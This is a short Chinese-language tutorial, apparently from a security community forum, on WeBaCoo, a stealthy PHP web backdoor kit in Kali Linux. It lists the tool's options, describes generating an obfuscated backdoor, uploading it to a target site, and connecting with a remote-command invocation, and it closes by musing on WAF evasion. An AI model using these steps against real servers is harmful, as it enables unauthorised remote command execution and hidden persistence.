1.文章难易度【★★★】
2.php后门文件
3.文章作者:sn0w
4.本文参与i春秋社区原创文章奖励计划,未经许可禁止转载
WeBaCoo (Web Backdoor Cookie) script-kit是一个小巧的、隐蔽的php后门,它提供了一个可以连接远程web服务器并执行php代码的终端。WeBaCoo使用HTTP响应头传送命令结果,shell命令经base64编码后隐藏在Cookie头中。
在kali下终端输入webacoo即可启动软件
帮助菜单
[AppleScript] 纯文本查看 复制代码
|
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
-g Generate backdoor code (-o is required) //生成后门文件 -f FUNCTION PHP System function to use //使用php函数 FUNCTION 1: system (default) 2: shell_exec 3: exec 4: passthru 5: popen -o OUTPUT Generated backdoor output filename //生成后门的文件地址/文件名 -r Return un-obfuscated backdoor code //生成混淆后的后门代码 -t Establish remote "terminal" connection (-u is required) //连接后门文件 -u URL Backdoor URL //后门地址 -e CMD Single command execution mode (-t and -u are required) //执行CMD命令 -m METHOD HTTP method to be used (default is GET) //使用HTTP方法 -c C_NAME Cookie name (default: "M-cookie") -d DELIM Delimiter (default: New random for each request) -a AGENT HTTP header user-agent (default exist) -p PROXY Use proxy (tor, ip:port or user:pass:ip:port) //使用代理服务器 -v LEVEL Verbose level //显示等级 LEVEL 0: no additional info (default) //不显示 1: print HTTP headers //输出http头 2: print HTTP headers + data //输出http头+数据 -l LOG Log activity to file //输出日志文件 -h Display help and exit //显示帮助 update Check for updates and apply if any //更新 |
我们生成一个后门文件:
此操作会产生一个使用system函数并且经过混淆后的后门文件,如图(整理后)
我们将后门文件传到目标网站内(我这里使用的本地测试)执行
连接后门文件:
webacoo -t -u http://host/backdoor.php
可以执行任意命令
更多功能看帮助者自己研究
这算不算过狗呢
